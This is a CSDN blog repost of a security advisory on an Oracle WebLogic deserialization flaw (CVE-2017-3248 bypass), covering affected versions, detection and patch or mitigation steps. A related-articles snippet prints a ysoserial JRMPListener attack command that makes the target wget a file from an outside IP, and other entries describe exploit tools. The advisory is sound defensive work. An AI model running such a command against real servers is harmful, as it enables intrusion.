java反序列化weblogic_Oracle WebLogic Java反序列化漏洞通知

最新推荐文章于 2023-09-19 17:29:58 发布
最新推荐文章于 2023-09-19 17:29:58 发布
阅读量171 收藏
点赞数
文章标签: java反序列化weblogic
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29035147/article/details/114455019
版权

尊敬的用户:

您好!Oracle WebLogic被曝出存在Java反序列化漏洞(CVE-2017-3248)修复方案绕过风险,被攻击者利用可造成服务器被入侵和业务数据被窃取。

该漏洞风险等级为高,为保证您的服务器安全,我们建议您及时开展安全自查并开展漏洞修复工作,详情参见如下指引说明:

【漏洞概述】

当用户提交一个精心构造的恶意的序列化数据到服务器端时,由于Oracle WebLogic在反序列化时存在漏洞,可导致远程任意代码执行漏洞,由于Oracle官方早期提供的修复方法为黑名单方式,但当出现新的类调用时,可绕过黑名单限制;

【风险等级】

高风险

【漏洞影响】

服务器被入侵,被攻击者利用可导致任意代码执行;

【影响版本】

OracleWebLogic 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1;

【漏洞检测】

1)查看您使用版本是否在受影响范围

2)在1的基础上,查看端口7001是否对外开放;

【修复建议】

1、目前官方已经发布最新修复补丁,您可以参照官网的最新修复方案修复漏洞(官方地址:http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html)

1)可更新p25388747_1036_Generic(10.3.6.0.170418)这个官方最新的补丁,除此之外其它补丁均不安全

2、也可以参见以下几点临时缓解措施修复:

1)升级JDK版本,由于Java在今年一月份以后更新了反序列化防御接口,可以缓解反序列化漏洞的影响

2)升级WebLogic、删除不需要的页面,清理不安全的第三方库

3)检查WebLogic端口7001是否开放,若非必须,可配置安全组机器7001出入流量;

【相关参考】

1)http://www.securityfocus.com/bid/95465

2)http://www.cnvd.org.cn/flaw/show/CNVD-2017-00919

3)http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html#AppendixFMW

绝代小李
关注
Oracle+Weblogic+Server+Java反序列化漏洞 解决方案
04-20
Oracle+Weblogic+Server+Java反序列化漏洞 解决方案 Oracle+Weblogic+Server+Java反序列化漏洞 解决方案
Oracle Weblogic Server Java反序列化漏洞(CVE-2018-2628)修复指南
cuanzhen8885的博客
04-20 1202
WebLogic反序列化漏洞(CVE-2018-2628)安全预警 TAG Oracle ...
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)
最新发布
rumil的博客
09-19 8965
WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
weblogic反序列化_CVE20163510:Weblogic反序列化分析
weixin_39662594的博客
11-26 991
更多全球网络安全资讯尽在邑安全影响范围Oracle WebLogic Server 12.2.1.0Oracle WebLogic Server 12.1.3.0Oracle WebLogic Server 12.1.2.0Oracle WebLogic Server 10.3.6.0演示环境Oracle WebLogic Server 10.3.6.0Windows 10.0.1836...
(转)Weblogic反序列化高危漏洞
w2363075992的博客
05-22 3850
转自:http://www.sohu.com/a/154670296_99890213?qq-pf-to=pcqq.c2c我选择的是第五种方法解决的。一、WebLogic Server Security Alert安全问题描述WebLogic Server反序列化安全漏洞补丁:CVE-2015-4852;Apache Commons Collections 3和4,Groovy,Spring,只要...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
java反序列化漏洞利用工具WebLogicExploit_weblogic图形化漏洞利用工具
09-01
WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布...
weblogic反序列化全版本漏洞利用工具
06-27
weblogic反序列化全版本漏洞利用工具,可执行命令
java反序列化漏洞利用工具Jboss&WebLogic;.rar
07-23
WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布...
Oracle WebLogic Java反序列化远程代码执行漏洞CVE-2020-2963分析
further_eye的博客
11-06 1646
2020年4月,Oracle官方发布了重要补丁更新,其中包括了漏洞CVE-2020-2963,漏洞等级定义为高危。 在SOAPInvokeState类中存在漏洞,未对序列化数据的安全性做检测,攻击者可以通过T3协议发送精心构造的序列化数据,从而达成远程代码执行的效果。
oracle weblogic漏洞,Oracle WebLogic RCE反序列化漏洞分析
weixin_39667398的博客
04-08 375
Author: Zhiyi Zhang of 360 ESG Codesafe Team前言Oracle 官方在7月份发布关键补丁更新之后,我在当月随后陆续提交了一些weblogic的不同类型漏洞,由于官方并 没有全部修复完成,本次的补丁修复了我报送的6个漏洞,其中有3个漏洞由于某些原因合并成1个CVE,本文针对10 月份这次补丁修复的其他两个漏洞进行简单分析。其中CVE-2018-3245是补来...
Weblogic Java反序列化漏洞修复2
weixin_33957648的博客
07-07 263
2019独角兽企业重金招聘Python工程师标准>>> ...
关于java反序列化漏洞java deserialization vulnerability)
msdnchina的专栏@JiNan,ShanDong
01-20 1850
java反序列化漏洞java deserialization vulnerability)
rmi远程反序列化rce漏洞_Oracle WebLogic 反序列化远程命令执行漏洞预警
weixin_39622988的博客
12-12 147
报告编号:B6-2019-041901报告来源:360-CERT报告作者:360-CERT更新日期:2019-04-190x00 事件背景2019年4月17日,国家信息安全漏洞共享平台(CNVD)收录了由中国民生银行股份有限公司报送的Oracle WebLogic wls9-async反序列化远程命令执行漏洞(CNVD-C-2019-48814)。攻击者利用该漏洞,可在未授权的情况下远程执行命令。...
WebLogic Java反序列化漏洞终极建议
热门推荐
水滴石穿
09-25 1万+
title: WebLogic Java反序列化漏洞终极建议 author: rocklei123 tags: Java WebLogic categories: Spring date: 2018-09-25 09:27:33 0. 概述: 本文针对这几年来WebLogic软件经常报出的java反序列化漏洞问题进行总结,其他中间件软件本文暂不讨论。内容主要涵盖客户最关心的一些问题、工程师...
WebLogic反序列化漏洞复现+利用工具(CVE-2021-2394)
0xSec
04-08 4520
Oracle官方发布了2021年7月份安全更新通告,通告中披露了WebLogic组件存在高危漏洞,攻击者可以在未授权的情况下通过IIOP、T3协议对存在漏洞WebLogic Server组件进行攻击。成功利用该漏洞的攻击者可以接管WebLogic Server。这是一个二次反序列化漏洞,是CVE-2020-14756和CVE-2020-14825的调用链相结合组成一条新的调用链来绕过weblogic黑名单列表。
Weblogic反序列化漏洞(CVE-2018-2628)
weixin_46411728的博客
11-15 4061
Weblogic反序列化漏洞(CVE-2018-2628)
CVE-2017-3248简单复现
ddr12231的博客
09-17 886
我是这样操作的 目标跟windows在一个段,linux是另一个段的,我的虚拟机 windows主机上 `java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 "wget http://11.205.242.98/32.txt" linux虚拟机上执行 python exploit-C...
WebLogic 10.3.6 反序列化漏洞补丁安装指南
在网络安全领域,反序列化漏洞是一种常见的攻击手段,攻击者可以通过恶意构造的序列化对象来触发服务器的不安全行为,可能导致远程代码执行、信息泄露等严重后果。WebLogic,作为Oracle公司的一款企业级应用服务器,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值